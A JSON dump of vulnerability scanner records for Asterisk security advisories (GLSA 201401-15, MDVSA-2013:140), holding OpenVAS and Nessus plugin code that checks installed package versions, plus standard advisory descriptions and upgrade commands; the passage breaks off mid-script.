{"id": "OPENVAS:1361412562310121112", "type": "openvas", "bulletinFamily": "scanner", "title": "Gentoo Security Advisory GLSA 201401-15", "description": "Gentoo Linux Local Security Checks GLSA 201401-15", "published": "2015-09-29T00:00:00", "modified": "2018-10-26T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121112", "reporter": "Eero Volotinen", "references": ["https://security.gentoo.org/glsa/201401-15"], "cvelist": ["CVE-2013-5641", "CVE-2013-2264", "CVE-2013-2685", "CVE-2013-5642", "CVE-2012-5976", "CVE-2012-5977", "CVE-2013-7100", "CVE-2013-2686"], "lastseen": "2019-05-29T18:36:19", "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2013-029", "CPAI-2013-1661", "CPAI-2013-2961", "CPAI-2013-3492"]}, {"type": "cve", "idList": ["CVE-2012-5976", "CVE-2012-5977", "CVE-2013-2264", "CVE-2013-2685", "CVE-2013-2686", "CVE-2013-5641", "CVE-2013-5642", "CVE-2013-7100"]}, {"type": "debian", "idList": ["DEBIAN:DSA-2605-1:42394", "DEBIAN:DSA-2605-2:4DD7B", "DEBIAN:DSA-2749-1:E342B", "DEBIAN:DSA-2835-1:D99AD"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2012-5976", "DEBIANCVE:CVE-2012-5977", "DEBIANCVE:CVE-2013-2264", "DEBIANCVE:CVE-2013-2685", "DEBIANCVE:CVE-2013-2686", "DEBIANCVE:CVE-2013-5641", "DEBIANCVE:CVE-2013-5642", "DEBIANCVE:CVE-2013-7100"]}, {"type": "fedora", "idList": ["FEDORA:0DA4021EBA", "FEDORA:307A42200F", "FEDORA:3C5CC215B2", "FEDORA:3F08C21512", "FEDORA:6763920EE9", "FEDORA:69DC620A83", "FEDORA:6D7AD209F1", "FEDORA:6E56421203", "FEDORA:A1E1F217E8", "FEDORA:ADB8421654"]}, {"type": "freebsd", "idList": ["0C39BAFC-6771-11E3-868F-0025905A4771", "DAF0A339-9850-11E2-879E-D43D7E0C7C02", "F7C87A8A-55D5-11E2-A255-C8600054B392", "FD2BF3B5-1001-11E3-BA94-0025905A4771"]}, {"type": "gentoo", "idList": ["GLSA-201401-15"]}, {"type": "mageia", "idList": ["MGASA-2013-0266", "MGASA-2013-0384", 
"MGASA-2014-0171"]}, {"type": "nessus", "idList": ["6690.PRM", "6750.PRM", "8006.PRM", "8007.PRM", "ASTERISK_AST_2012_015.NASL", "ASTERISK_AST_2013_001.NASL", "ASTERISK_AST_2013_002.NASL", "ASTERISK_AST_2013_003.NASL", "ASTERISK_AST_2013_004.NASL", "ASTERISK_AST_2013_005.NASL", "ASTERISK_AST_2013_007.NASL", "DEBIAN_DSA-2605.NASL", "DEBIAN_DSA-2749.NASL", "DEBIAN_DSA-2835.NASL", "FEDORA_2013-0992.NASL", "FEDORA_2013-0994.NASL", "FEDORA_2013-1003.NASL", "FEDORA_2013-15560.NASL", "FEDORA_2013-15567.NASL", "FEDORA_2013-24108.NASL", "FEDORA_2013-24119.NASL", "FEDORA_2013-24142.NASL", "FEDORA_2013-4528.NASL", "FEDORA_2013-4566.NASL", "FREEBSD_PKG_0C39BAFC677111E3868F0025905A4771.NASL", "FREEBSD_PKG_DAF0A339985011E2879ED43D7E0C7C02.NASL", "FREEBSD_PKG_F7C87A8A55D511E2A255C8600054B392.NASL", "FREEBSD_PKG_FD2BF3B5100111E3BA940025905A4771.NASL", "GENTOO_GLSA-201401-15.NASL", "MANDRIVA_MDVSA-2013-140.NASL", "MANDRIVA_MDVSA-2013-223.NASL", "MANDRIVA_MDVSA-2013-300.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310702835", "OPENVAS:1361412562310802063", "OPENVAS:1361412562310865254", "OPENVAS:1361412562310865264", "OPENVAS:1361412562310865273", "OPENVAS:1361412562310865535", "OPENVAS:1361412562310865538", "OPENVAS:1361412562310866888", "OPENVAS:1361412562310866890", "OPENVAS:1361412562310867223", "OPENVAS:1361412562310867224", "OPENVAS:1361412562310867306", "OPENVAS:1361412562310892605", "OPENVAS:1361412562310892749", "OPENVAS:702835", "OPENVAS:865254", "OPENVAS:865264", "OPENVAS:865273", "OPENVAS:865535", "OPENVAS:865538", "OPENVAS:866888", "OPENVAS:866890", "OPENVAS:867223", "OPENVAS:867224", "OPENVAS:867306", "OPENVAS:892605", "OPENVAS:892749"]}, {"type": "osv", "idList": ["OSV:DSA-2605-1", "OSV:DSA-2749-1", "OSV:DSA-2835-1"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:28927", "SECURITYVULNS:DOC:28928", "SECURITYVULNS:DOC:29220", "SECURITYVULNS:DOC:29221", "SECURITYVULNS:DOC:29222", "SECURITYVULNS:VULN:12811", "SECURITYVULNS:VULN:12974"]}, {"type": 
"ubuntucve", "idList": ["UB:CVE-2012-5976", "UB:CVE-2012-5977", "UB:CVE-2013-2264", "UB:CVE-2013-2685", "UB:CVE-2013-2686", "UB:CVE-2013-5641", "UB:CVE-2013-5642", "UB:CVE-2013-7100"]}]}, "score": {"value": 0.1, "vector": "NONE"}, "backreferences": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2013-3492"]}, {"type": "cve", "idList": ["CVE-2012-5976", "CVE-2012-5977"]}, {"type": "debian", "idList": ["DEBIAN:DSA-2605-2:4DD7B"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2013-5642"]}, {"type": "fedora", "idList": ["FEDORA:6D7AD209F1", "FEDORA:6E56421203"]}, {"type": "freebsd", "idList": ["0C39BAFC-6771-11E3-868F-0025905A4771", "DAF0A339-9850-11E2-879E-D43D7E0C7C02", "F7C87A8A-55D5-11E2-A255-C8600054B392", "FD2BF3B5-1001-11E3-BA94-0025905A4771"]}, {"type": "nessus", "idList": ["6690.PRM", "ASTERISK_AST_2013_003.NASL", "ASTERISK_AST_2013_005.NASL", "FEDORA_2013-1003.NASL", "FEDORA_2013-4566.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310866890", "OPENVAS:892749"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:29220", "SECURITYVULNS:DOC:29221"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2013-5642", "UB:CVE-2013-7100"]}]}, "exploitation": null, "vulnersScore": 0.1}, "pluginID": "1361412562310121112", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa-201401-15.nasl 12128 2018-10-26 13:35:25Z cfischer $\n#\n# Gentoo Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or 
FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.121112\");\n script_version(\"$Revision: 12128 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-29 11:26:35 +0300 (Tue, 29 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 15:35:25 +0200 (Fri, 26 Oct 2018) $\");\n script_name(\"Gentoo Security Advisory GLSA 201401-15\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities have been discovered in Asterisk. Please review the CVE identifiers referenced below for details.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://security.gentoo.org/glsa/201401-15\");\n script_cve_id(\"CVE-2012-5976\", \"CVE-2012-5977\", \"CVE-2013-2264\", \"CVE-2013-2685\", \"CVE-2013-2686\", \"CVE-2013-5641\", \"CVE-2013-5642\", \"CVE-2013-7100\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Gentoo Linux Local Security Checks GLSA 201401-15\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Gentoo Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = 
\"\";\n\nif((res=ispkgvuln(pkg:\"net-misc/asterisk\", unaffected: make_list(\"ge 11.7.0\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"net-misc/asterisk\", unaffected: make_list(\"ge 1.8.25.0\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"net-misc/asterisk\", unaffected: make_list(), vulnerable: make_list(\"lt 11.7.0\"))) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "naslFamily": "Gentoo Local Security Checks", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1660004461, "score": 1659976568}, "_internal": {"score_hash": "1b7a417854e0d7cda143e97261ae53be"}}
{"gentoo": [{"lastseen": "2022-01-17T19:09:28", "description": "### Background\n\nAsterisk is an open source telephony engine and toolkit.\n\n### Description\n\nMultiple vulnerabilities have been discovered in Asterisk. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker could execute arbitrary code with the privileges of the process, cause a Denial of Service condition, or obtain sensitive information. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Asterisk 11.* users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-misc/asterisk-11.7.0\"\n \n\nAll Asterisk 1.8.* users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-misc/asterisk-1.8.25.0\"", "cvss3": {}, "published": "2014-01-21T00:00:00", "type": "gentoo", "title": "Asterisk: Multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5976", "CVE-2012-5977", "CVE-2013-2264", "CVE-2013-2685", "CVE-2013-2686", "CVE-2013-5641", "CVE-2013-5642", "CVE-2013-7100"], "modified": "2014-01-21T00:00:00", "id": "GLSA-201401-15", "href": "https://security.gentoo.org/glsa/201401-15", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2023-01-18T14:26:54", "description": "The remote host is affected by the vulnerability described in GLSA-201401-15 (Asterisk: Multiple vulnerabilities)\n\n Multiple 
vulnerabilities have been discovered in Asterisk. Please review the CVE identifiers referenced below for details.\n Impact :\n\n A remote attacker could execute arbitrary code with the privileges of the process, cause a Denial of Service condition, or obtain sensitive information.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {}, "published": "2014-01-21T00:00:00", "type": "nessus", "title": "GLSA-201401-15 : Asterisk: Multiple vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5976", "CVE-2012-5977", "CVE-2013-2264", "CVE-2013-2685", "CVE-2013-2686", "CVE-2013-5641", "CVE-2013-5642", "CVE-2013-7100"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:asterisk", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201401-15.NASL", "href": "https://www.tenable.com/plugins/nessus/72054", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201401-15.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. 
See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(72054);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2012-5976\", \"CVE-2012-5977\", \"CVE-2013-2264\", \"CVE-2013-2685\", \"CVE-2013-2686\", \"CVE-2013-5641\", \"CVE-2013-5642\", \"CVE-2013-7100\");\n script_xref(name:\"GLSA\", value:\"201401-15\");\n\n script_name(english:\"GLSA-201401-15 : Asterisk: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201401-15\n(Asterisk: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Asterisk. 
Please review\n the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could execute arbitrary code with the privileges of\n the process, cause a Denial of Service condition, or obtain sensitive\n information.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201401-15\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Asterisk 11.* users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-misc/asterisk-11.7.0'\n All Asterisk 1.8.* users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-misc/asterisk-1.8.25.0'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:asterisk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/01/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/01/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) 
audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"net-misc/asterisk\", unaffected:make_list(\"ge 11.7.0\", \"rge 1.8.25.0\"), vulnerable:make_list(\"lt 11.7.0\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Asterisk\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-12T15:56:44", "description": "Multiple vulnerablilities was identified and fixed in asterisk :\n\nThe SIP channel driver in Asterisk Open Source 1.8.x before 1.8.20.2, 10.x before 10.12.2, and 11.x before 11.2.2; Certified Asterisk 1.8.15 before 1.8.15-cert2; Asterisk Business Edition (BE) C.3.x before C.3.8.1; and Asterisk Digiumphones 10.x-digiumphones before 10.12.2-digiumphones exhibits different behavior for invalid INVITE, SUBSCRIBE, and REGISTER transactions depending on whether the user account exists, which allows remote attackers to enumerate account names by (1) reading HTTP status codes, (2) reading additional text in a 403 (aka Forbidden) response, or (3) observing whether certain retransmissions occur (CVE-2013-2264).\n\nStack-based buffer overflow in res/res_format_attr_h264.c in Asterisk Open Source 11.x before 11.2.2 allows remote attackers to execute arbitrary code via a long sprop-parameter-sets H.264 media attribute in a SIP Session Description Protocol (SDP) header (CVE-2013-2685).\n\nmain/http.c in the HTTP server in Asterisk Open Source 1.8.x before 1.8.20.2, 10.x before 10.12.2, and 11.x before 11.2.2; Certified Asterisk 1.8.15 before 1.8.15-cert2; and Asterisk Digiumphones 10.x-digiumphones before 10.12.2-digiumphones does not properly restrict Content-Length values, which allows remote attackers to conduct stack-consumption attacks and cause a denial of service (daemon 
crash) via a crafted HTTP POST request. NOTE: this vulnerability exists because of an incorrect fix for CVE-2012-5976 (CVE-2013-2686).\n\nThe updated packages have upgraded to the 11.2.2 version which is not vulnerable to these issues", "cvss3": {}, "published": "2013-04-20T00:00:00", "type": "nessus", "title": "Mandriva Linux Security Advisory : asterisk (MDVSA-2013:140)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5976", "CVE-2013-2264", "CVE-2013-2685", "CVE-2013-2686"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:asterisk", "p-cpe:/a:mandriva:linux:asterisk-addons", "p-cpe:/a:mandriva:linux:asterisk-devel", "p-cpe:/a:mandriva:linux:asterisk-firmware", "p-cpe:/a:mandriva:linux:asterisk-plugins-alsa", "p-cpe:/a:mandriva:linux:asterisk-plugins-calendar", "p-cpe:/a:mandriva:linux:asterisk-plugins-cel", "p-cpe:/a:mandriva:linux:asterisk-plugins-corosync", "p-cpe:/a:mandriva:linux:asterisk-plugins-curl", "p-cpe:/a:mandriva:linux:asterisk-plugins-dahdi", "p-cpe:/a:mandriva:linux:asterisk-plugins-fax", "p-cpe:/a:mandriva:linux:asterisk-plugins-festival", "p-cpe:/a:mandriva:linux:asterisk-plugins-ices", "p-cpe:/a:mandriva:linux:asterisk-plugins-jabber", "p-cpe:/a:mandriva:linux:asterisk-plugins-jack", "p-cpe:/a:mandriva:linux:asterisk-plugins-ldap", "p-cpe:/a:mandriva:linux:asterisk-plugins-lua", "p-cpe:/a:mandriva:linux:asterisk-plugins-minivm", "p-cpe:/a:mandriva:linux:asterisk-plugins-mobile", "p-cpe:/a:mandriva:linux:asterisk-plugins-mp3", 
"p-cpe:/a:mandriva:linux:asterisk-plugins-mysql", "p-cpe:/a:mandriva:linux:asterisk-plugins-ooh323", "p-cpe:/a:mandriva:linux:asterisk-plugins-osp", "p-cpe:/a:mandriva:linux:asterisk-plugins-oss", "p-cpe:/a:mandriva:linux:asterisk-plugins-pgsql", "p-cpe:/a:mandriva:linux:asterisk-plugins-pktccops", "p-cpe:/a:mandriva:linux:asterisk-plugins-portaudio", "p-cpe:/a:mandriva:linux:asterisk-plugins-radius", "p-cpe:/a:mandriva:linux:asterisk-plugins-saycountpl", "p-cpe:/a:mandriva:linux:asterisk-plugins-skinny", "p-cpe:/a:mandriva:linux:asterisk-plugins-snmp", "p-cpe:/a:mandriva:linux:asterisk-plugins-speex", "p-cpe:/a:mandriva:linux:asterisk-plugins-sqlite", "p-cpe:/a:mandriva:linux:asterisk-plugins-tds", "p-cpe:/a:mandriva:linux:asterisk-plugins-unistim", "p-cpe:/a:mandriva:linux:asterisk-plugins-voicemail", "p-cpe:/a:mandriva:linux:asterisk-plugins-voicemail-imap", "p-cpe:/a:mandriva:linux:asterisk-plugins-voicemail-plain", "p-cpe:/a:mandriva:linux:lib64asteriskssl1", "cpe:/o:mandriva:business_server:1"], "id": "MANDRIVA_MDVSA-2013-140.NASL", "href": "https://www.tenable.com/plugins/nessus/66152", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2013:140. 
\n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(66152);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2013-2264\", \"CVE-2013-2685\", \"CVE-2013-2686\");\n script_bugtraq_id(58756, 58760, 58764);\n script_xref(name:\"MDVSA\", value:\"2013:140\");\n\n script_name(english:\"Mandriva Linux Security Advisory : asterisk (MDVSA-2013:140)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple vulnerablilities was identified and fixed in asterisk :\n\nThe SIP channel driver in Asterisk Open Source 1.8.x before 1.8.20.2,\n10.x before 10.12.2, and 11.x before 11.2.2; Certified Asterisk 1.8.15\nbefore 1.8.15-cert2; Asterisk Business Edition (BE) C.3.x before\nC.3.8.1; and Asterisk Digiumphones 10.x-digiumphones before\n10.12.2-digiumphones exhibits different behavior for invalid INVITE,\nSUBSCRIBE, and REGISTER transactions depending on whether the user\naccount exists, which allows remote attackers to enumerate account\nnames by (1) reading HTTP status codes, (2) reading additional text in\na 403 (aka Forbidden) response, or (3) observing whether certain\nretransmissions occur (CVE-2013-2264).\n\nStack-based buffer overflow in res/res_format_attr_h264.c in Asterisk\nOpen Source 11.x before 11.2.2 allows remote attackers to execute\narbitrary code via a long sprop-parameter-sets H.264 media attribute\nin a SIP Session Description Protocol (SDP) header (CVE-2013-2685).\n\nmain/http.c in the HTTP server in Asterisk Open Source 1.8.x before\n1.8.20.2, 10.x before 10.12.2, and 11.x before 11.2.2; Certified\nAsterisk 1.8.15 before 1.8.15-cert2; and 
Asterisk Digiumphones\n10.x-digiumphones before 10.12.2-digiumphones does not properly\nrestrict Content-Length values, which allows remote attackers to\nconduct stack-consumption attacks and cause a denial of service\n(daemon crash) via a crafted HTTP POST request. NOTE: this\nvulnerability exists because of an incorrect fix for CVE-2012-5976\n(CVE-2013-2686).\n\nThe updated packages have upgraded to the 11.2.2 version which is not\nvulnerable to these issues\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-addons\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-alsa\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-calendar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-cel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-corosync\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-dahdi\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-fax\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-festival\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-ices\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-jabber\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-jack\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-lua\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-minivm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-mobile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-mp3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-ooh323\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-osp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-oss\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-pktccops\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-portaudio\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-radius\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-saycountpl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-skinny\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-speex\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-sqlite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-tds\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-unistim\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-voicemail\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-voicemail-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-voicemail-plain\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64asteriskssl1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/04/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/04/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif 